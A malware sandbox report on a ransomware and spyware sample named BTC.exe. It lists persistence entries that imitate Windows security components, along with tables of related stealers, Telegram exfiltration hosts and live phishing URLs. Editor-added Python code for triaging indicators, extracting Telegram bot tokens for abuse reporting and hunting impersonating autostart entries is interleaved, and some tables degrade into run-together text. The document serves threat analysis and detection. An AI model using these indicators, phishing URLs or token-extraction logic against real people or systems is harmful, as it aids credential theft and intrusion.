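        ind = Indicator(url, host, source, malicious, verdict, categorise(url, host))
        if ind.category == "payload-staging" and is_ip(host):
            ind.notes.append("download from bare IP literal")
        if malicious and verdict.lower().endswith("safe"):
            ind.notes.append("report says malicious, AV reputation says safe: judge by context")
        out.append(ind)
    return out


def telegram_secrets(rows) -> list:
    """Bot id, token, API method and chat_id for every Telegram bot URL, for abuse reporting."""
    found = []
    for url, source, *_ in rows:
        m = TELEGRAM_BOT.search(url)
        if m:
            chat = parse_qs(urlsplit(url).query).get("chat_id", [""])[0]
            found.append({**m.groupdict(), "chat_id": chat, "source": source})
    return found


def av_disagreements(indicators) -> list:
    """URLs the report marks malicious while the AV reputation says safe."""
    return [i.url for i in indicators if i.report_malicious and i.av_verdict.lower().endswith("safe")]


if __name__ == "__main__":
    for ind in triage(ROWS):
        print(f"{ind.category:16} {ind.host:36} {ind.source:20} {'; '.join(ind.notes)}")
    for s in telegram_secrets(ROWS):
        print(f"telegram bot {s['bot_id']} via {s['method']} to chat {s['chat_id']} from {s['source']}")
```

The token regex is deliberately strict (numeric id, colon, 35 characters) so it does not fire on the truncated `https://api.tele` fragment in the table; the `av_disagreements` list is where the Telegram row lands, which is the row a reputation-only pipeline would have dropped.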
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1503194
Start date and time: 2024-09-03 06:15:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 115
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BTC.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@160/314@6/12
EGA Information:
• Successful, ratio: 61.1%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 456
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BTC.exe, PID 2796 because it is empty
• Execution Graph export aborted for target Windows Defender Service Host.exe, PID 6588 because it is empty
• Execution Graph export aborted for target Windows Defender Service Host.exe, PID 7500 because it is empty
• Execution Graph export aborted for target Windows Defender Service Host.exe, PID 8700 because it is empty
• Execution Graph export aborted for target Windows Defender Service Host.exe, PID 9140 because it is empty
• Execution Graph export aborted for target crack.exe, PID 5972 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5580 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 00:15:57 | API Interceptor | 1x Sleep call for process: crack.exe modified |
| 00:16:01 | API Interceptor | 317x Sleep call for process: powershell.exe modified |
| 00:16:03 | API Interceptor | 1654204x Sleep call for process: Windows Security.exe modified |
| 00:16:04 | API Interceptor | 3145377x Sleep call for process: Windows Defender Service Host.exe modified |
| 00:16:34 | API Interceptor | 1885x Sleep call for process: Window Security.exe modified |
| 00:16:37 | API Interceptor | 818718x Sleep call for process: svchost.exe modified |
| 00:16:37 | API Interceptor | 869284x Sleep call for process: update.exe modified |
| 00:16:59 | API Interceptor | 20655x Sleep call for process: Windows Security Health Service.exe modified |
| 06:15:58 | Task Scheduler | Run new task: Windows Security Health Service, path: "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe" |
| 06:15:59 | Task Scheduler | Run new task: Windows Update, path: C:\Users\user\AppData\Roaming\Window Security.exe |
| 06:16:01 | Task Scheduler | Run new task: Windows Defender Service Host, path: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe |
| 06:16:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Windows Defender Service Host" = C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe |
| 06:16:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value "Windows Defender Service Host" = C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe |
| 06:16:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk |
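The three persistence mechanisms in the timeline share one pattern: a scheduled-task name, a Run value or a Startup-folder shortcut that borrows the name of a Windows security component, pointing at an executable under the user's AppData\Roaming (and one of the images, "Window Security.exe", is a near-miss spelling of the real thing). The following is an added example, not code from the report, that encodes that pattern as a hunt over exported autostart entries. The events are constructed from this report's timeline plus two benign control entries invented for contrast; the impersonated-name list and the 0.8 similarity threshold are the editor's assumptions, and in real use the input would come from an Autoruns or Get-ScheduledTask export rather than a literal list.

```python
"""Hunt autostart entries that impersonate Windows security components.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
this report's Task Scheduler / Run key / Startup folder timeline plus two
benign control entries invented for contrast. Assumptions: the IMPERSONATED
list and the 0.8 similarity threshold are the editor's choices.
"""
import re
from difflib import SequenceMatcher
from pathlib import PureWindowsPath

EVENTS = [
    # (kind, name as recorded, image path) taken from the report's timeline
    ("Task Scheduler", "Windows Security Health Service",
     r"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"),
    ("Task Scheduler", "Windows Update",
     r"C:\Users\user\AppData\Roaming\Window Security.exe"),
    ("Task Scheduler", "Windows Defender Service Host",
     r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"),
    ("Run key", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender Service Host",
     r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"),
    ("Startup folder", "Windows Defender Service Host.lnk",
     r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk"),
    # constructed benign controls: a per-user app that legitimately lives under
    # AppData, and a genuine Defender task that legitimately carries the name
    ("Run key", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    ("Task Scheduler", r"\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan",
     r"C:\Program Files\Windows Defender\MpCmdRun.exe"),
]

# Component names the dropper borrowed (assumption: short list, extend for real use)
IMPERSONATED = ["Windows Defender", "Windows Security", "Windows Update", "Security Health Service"]

# Profile locations no signed Windows component is installed to
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata\\(roaming|local\\temp)|downloads|desktop|documents)\\",
    re.IGNORECASE)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\(windows|program files( \(x86\))?)\\", re.IGNORECASE)


def lookalike(name: str, canonical: str, threshold: float = 0.8) -> bool:
    """True if `name` contains `canonical` or is a near-miss spelling of it,
    so "Window Security" still matches "Windows Security"."""
    n, c = name.lower(), canonical.lower()
    return c in n or SequenceMatcher(None, n, c).ratio() >= threshold


def assess(kind: str, name: str, image: str) -> list:
    """Reasons an autostart entry is suspicious; an empty list means nothing fired."""
    reasons = []
    display = name.rsplit("\\", 1)[-1]        # last element of a Run value path or task path
    stem = PureWindowsPath(image).stem        # file name without .exe / .lnk
    imitates = [c for c in IMPERSONATED if lookalike(display, c) or lookalike(stem, c)]
    if USER_WRITABLE.match(image):
        reasons.append("image in user-writable profile path")
    if imitates and not SYSTEM_DIRS.match(image):
        reasons.append("name imitates " + ", ".join(imitates))
    if kind == "Startup folder" and image.lower().endswith(".lnk"):
        reasons.append("startup shortcut; resolve the .lnk target before trusting it")
    return reasons


def hunt(events) -> list:
    """Every entry with at least one reason, as (kind, name, image, reasons)."""
    return [(k, n, i, r) for k, n, i in events if (r := assess(k, n, i))]


if __name__ == "__main__":
    for kind, name, image, reasons in hunt(EVENTS):
        print(f"[{kind}] {name}\n    {image}\n    " + "; ".join(reasons))
```

The two checks are kept independent on purpose: the path check alone would also flag OneDrive-style per-user installs, and the name check alone would flag Microsoft's own Defender tasks, so the name rule only fires when the image is outside Windows and Program Files, and the two reasons together are what single out the five entries from this report.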
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 149.154.167.220 | mSpv.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | Shipping Documents.bat.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | |
| 149.154.167.220 | Setup_IDM.exe | malicious | Fredy Stealer | |
| 149.154.167.220 | Setup_IDM.exe | malicious | Fredy Stealer | |
| 149.154.167.220 | chiara.exe | malicious | CryptOne, DarkTortilla, Mofksys, XWorm | |
| 149.154.167.220 | RFQ September Order PR 29235 doc-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | RFQ.docx.doc | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | Unmovablety.exe | malicious | GuLoader, Snake Keylogger | |
| 149.154.167.220 | Request for Quotation #P01042.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 208.95.112.1 | TMPN.exe | malicious | Skuld Stealer | ip-api.com/json |
| 208.95.112.1 | bkfaf34.exe | malicious | Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545 |
| 208.95.112.1 | 1d0000.MSBuild.exe | malicious | Xehook Stealer | ip-api.com/json/?fields=11827 |
| 208.95.112.1 | SolaraBoostrapper.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545 |
| 208.95.112.1 | 05HbyP1HCy.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | ip-api.com/json/ |
| 208.95.112.1 | r7XXceHRzO.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | znwFR6hkn8.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | Shipping Documents Cos090224.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 104.16.185.241 | Client.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/ |
| 104.16.185.241 | SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/ |
| 104.16.185.241 | 22.08.2024.exe | malicious | Xmrig | icanhazip.com/ |
| 104.16.185.241 | vYz1Z2heor.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/ |
| 104.16.185.241 | WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | icanhazip.com/ |
| 104.16.185.241 | PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | icanhazip.com/ |
| 104.16.185.241 | eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/ |
| 104.16.185.241 | 5oci4lcontract.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/ |
| 104.16.185.241 | viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/ |
| 104.16.185.241 | down.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| ip-api.com | TMPN.exe | malicious | Skuld Stealer | 208.95.112.1 |
| ip-api.com | bkfaf34.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1 |
| ip-api.com | 1d0000.MSBuild.exe | malicious | Xehook Stealer | 208.95.112.1 |
| ip-api.com | SolaraBoostrapper.exe | malicious | Blank Grabber | 208.95.112.1 |
| ip-api.com | 05HbyP1HCy.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1 |
| ip-api.com | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | 208.95.112.1 |
| ip-api.com | r7XXceHRzO.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | znwFR6hkn8.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | Shipping Documents Cos090224.exe | malicious | AgentTesla | 208.95.112.1 |
| api.mylnikov.org | client2.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.21.44.66 |
| api.mylnikov.org | Client.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114 |
| api.mylnikov.org | vYz1Z2heor.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114 |
| api.mylnikov.org | WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | 104.21.44.66 |
| api.mylnikov.org | PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | 104.21.44.66 |
| api.mylnikov.org | eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114 |
| api.mylnikov.org | 83MZfLKh7D.exe | malicious | AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine | 104.21.44.66 |
| api.mylnikov.org | viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.21.44.66 |
| api.mylnikov.org | LisectAVT_2403002B_4.exe | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer | 172.67.196.114 |
| api.mylnikov.org | 2U1S7Ab7YU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114 |
| api.telegram.org | mSpv.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | Shipping Documents.bat.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | 149.154.167.220 |
| api.telegram.org | Setup_IDM.exe | malicious | Fredy Stealer | 149.154.167.220 |
| api.telegram.org | Setup_IDM.exe | malicious | Fredy Stealer | 149.154.167.220 |
| api.telegram.org | chiara.exe | malicious | CryptOne, DarkTortilla, Mofksys, XWorm | 149.154.167.220 |
| api.telegram.org | RFQ September Order PR 29235 doc-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | RFQ.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | Unmovablety.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220 |
| api.telegram.org | Request for Quotation #P01042.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| icanhazip.com | client2.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.184.241 |
| icanhazip.com | Client.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241 |
| icanhazip.com | SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241 |
| icanhazip.com | 22.08.2024.exe | malicious | Xmrig | 104.16.185.241 |
| icanhazip.com | vYz1Z2heor.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241 |
| icanhazip.com | 4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exe | malicious | PureLog Stealer, SmokeLoader, TrojanRansom, zgRAT | 104.16.184.241 |
| icanhazip.com | WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | 104.16.185.241 |
| icanhazip.com | PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | 104.16.185.241 |
| icanhazip.com | eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241 |
| icanhazip.com | 83MZfLKh7D.exe | malicious | AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine | 104.16.184.241 |
| us-east-1.route-1.000webhost.awex.io | New_Document.js | malicious | Unknown | 145.14.145.64 |
| us-east-1.route-1.000webhost.awex.io | New_Document.js | malicious | Unknown | 145.14.144.16 |
| us-east-1.route-1.000webhost.awex.io | https://igphoto6.wixsite.com/website | malicious | Unknown | 145.14.145.230 |
| us-east-1.route-1.000webhost.awex.io | Scan0030930930-pdf.js | malicious | XWorm | 145.14.144.210 |
| us-east-1.route-1.000webhost.awex.io | https://01mallboxprofixers.com/fx/rapeir/?email=gbeaver@visitmonmouth.com | malicious | HTMLPhisher | 145.14.144.173 |
| us-east-1.route-1.000webhost.awex.io | http://xaxzim.000webhostapp.com/zimbra.html | malicious | Unknown | 145.14.144.64 |
| us-east-1.route-1.000webhost.awex.io | http://zimbra87apoeee.000webhostapp.com/in2p3.html | malicious | Unknown | 145.14.144.213 |
| us-east-1.route-1.000webhost.awex.io | zFONuE0fId.exe | malicious | Quasar, AsyncRAT, DCRat, Orcus, XWorm | 145.14.144.78 |
| us-east-1.route-1.000webhost.awex.io | Document-pdf.js | malicious | XWorm | 145.14.144.75 |
| us-east-1.route-1.000webhost.awex.io | PurcaseOrder pdf.js | malicious | XWorm | 145.14.144.151 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| TELEGRAMRU | mSpv.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| TELEGRAMRU | 1d0000.MSBuild.exe | malicious | Xehook Stealer | 149.154.167.99 |
| TELEGRAMRU | 66d5ddcec1520_shtr.exe | malicious | LummaC, Stealc, Vidar | 149.154.167.99 |
| TELEGRAMRU | 66d5ddcbb9f86_vyre.exe | malicious | LummaC, Vidar | 149.154.167.99 |
| TELEGRAMRU | Shipping Documents.bat.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| TELEGRAMRU | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT | 149.154.167.220 |
| TELEGRAMRU | Setup_IDM.exe | malicious | Fredy Stealer | 149.154.167.220 |
| TELEGRAMRU | Setup_IDM.exe | malicious | Fredy Stealer | 149.154.167.220 |
| TELEGRAMRU | chiara.exe | malicious | CryptOne, DarkTortilla, Mofksys, XWorm | 149.154.167.220 |
| TELEGRAMRU | RFQ September Order PR 29235 doc-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| DIGITALOCEAN-ASNUS | djvu452.exe | malicious | Neconyd | 64.225.91.73 |
| DIGITALOCEAN-ASNUS | https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/ | malicious | Unknown | 198.199.109.95 |
| DIGITALOCEAN-ASNUS | https://dkb-de-startseite-girokonto-factor.codeanyapp.com/Online/ | malicious | Unknown | 198.199.109.95 |
| DIGITALOCEAN-ASNUS | SecuriteInfo.com.ELF.Mirai-ARL.6285.13699.elf | malicious | Mirai | 134.209.74.81 |
| DIGITALOCEAN-ASNUS | ListenNowMsgs000037Secs_wav229.html | malicious | HTMLPhisher | 157.230.6.220 |
| DIGITALOCEAN-ASNUS | Új fertőző betegség.cmd.exe | malicious | Lokibot | 104.248.205.66 |
| DIGITALOCEAN-ASNUS | Fizetési megbízás.exe | malicious | Lokibot | 104.248.205.66 |
| DIGITALOCEAN-ASNUS | RFQ STR-160-01.exe | malicious | FormBook | 167.172.133.32 |
| DIGITALOCEAN-ASNUS | SecuriteInfo.com.Win32.CrypterX-gen.24939.766.exe | malicious | Lokibot | 104.248.205.66 |
| DIGITALOCEAN-ASNUS | https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E | malicious | HTMLPhisher | 104.248.15.35 |
| TUT-ASUS | TMPN.exe | malicious | Skuld Stealer | 208.95.112.1 |
| TUT-ASUS | bkfaf34.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1 |
| TUT-ASUS | 1d0000.MSBuild.exe | malicious | Xehook Stealer | 208.95.112.1 |
| TUT-ASUS | SolaraBoostrapper.exe | malicious | Blank Grabber | 208.95.112.1 |
| TUT-ASUS | 05HbyP1HCy.exe | malicious | AgentTesla, PureLog Stealer | |
                                                  • 208.95.112.1
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • 208.95.112.1
                                                  r7XXceHRzO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  znwFR6hkn8.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Shipping Documents Cos090224.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                   54328bd36c14bd82ddaa0c04b25ed9ad | mSpv.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   python-installer-3.12.5-amd64.exe | malicious | Agent Tesla, AgentTesla
                                                   • 145.14.144.231
                                                   Shipping Documents.bat.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   F7ZTvZi9K7.exe | malicious | PureLog Stealer, Snake Keylogger
                                                   • 145.14.144.231
                                                   dglkNNA6iF.exe | malicious | PureLog Stealer, Snake Keylogger
                                                   • 145.14.144.231
                                                   RFQ September Order PR 29235 doc-pdf.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   Unmovablety.exe | malicious | GuLoader, Snake Keylogger
                                                   • 145.14.144.231
                                                   Request for Quotation #P01042.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   Quote E68-STD-094.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 145.14.144.231
                                                   3b5074b1b5d032e5620f69f9f700ff0e | BL_CI_PL_Awb_Shipping_Invoice_doc_0002000920242247820020031808174CN18000200092024_pdf.vbs | malicious | GuLoader
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   FATT. N. 2563 DEL 30.08.2024 Antincendi Marche S.r.l..exe | malicious | AgentTesla
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   mSpv.exe | malicious | Snake Keylogger, VIP Keylogger
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   bkfaf34.exe | malicious | Blank Grabber, Umbral Stealer
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   Book_0256103.vbe | malicious | AgentTesla
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   https://shore-alkaline-canvas.glitch.me/public/nfcu703553.HTML | malicious | HTMLPhisher
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   https://ggu-lop.vercel.app/ | malicious | Unknown
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/ | malicious | Unknown
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   https://secure---page--coinbase-walet--sso.webflow.io/ | malicious | Unknown
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                   https://sso--cdn-en-coinbasepro-cdn-auth.webflow.io/ | malicious | Unknown
                                                   • 149.154.167.220
                                                   • 172.67.196.114
                                                  No context
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:OXn:OX
                                                  MD5:325EAEAC5BEF34937CFDC1BD73034D17
                                                  SHA1:D30CE1057C96900A624A4423AEDF9F6C7538CA33
                                                  SHA-256:6A4BB0C33BE315E5E095564A3E41488D597F30C3AADC323DA106BEEDF09C403C
                                                  SHA-512:224BD2F8A2924F76AEAE9DA0B01E3B6FCF8077AB69583160B1070C22A7D5FBEE2096639623FB369BB87D515EFE67C8821B5CFCAF1A78C0A4EAB525BE56FACDC0
                                                  Malicious:false
                                                  Preview:6742
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:very short file (no magic)
                                                  Category:modified
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:V:V
                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                  Malicious:false
                                                  Preview:0
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):105
                                                  Entropy (8bit):3.8863455911790052
                                                  Encrypted:false
                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                  Malicious:false
                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):94
                                                  Entropy (8bit):4.886397362842801
                                                  Encrypted:false
                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                  Malicious:false
                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):814
                                                  Entropy (8bit):5.23736360478791
                                                  Encrypted:false
                                                  SSDEEP:24:ChXIYyFteIqxj3Cvj8zSYCE19tDvTPupjucWjq:cXIYseIqxj3CQzSZE19tDrPupjuljq
                                                  MD5:1B0D52E28F02B57E0D1C044E42C567A7
                                                  SHA1:F5D7EFB021881DC867CAEA4EE99597D592B60B30
                                                  SHA-256:1E5407FDF60271E55C10CAB6252CF4706DAFE25AE144D80823F5FCDD372BBB1E
                                                  SHA-512:B5AC9573931BE5E905942FB228655B781285DBDF519E8174F3D772793AD37C82F284CF960EDC7E9B4B64ED535A75A039ED46D7E5F34EE93EE14B2514CBF2C8CF
                                                  Malicious:false
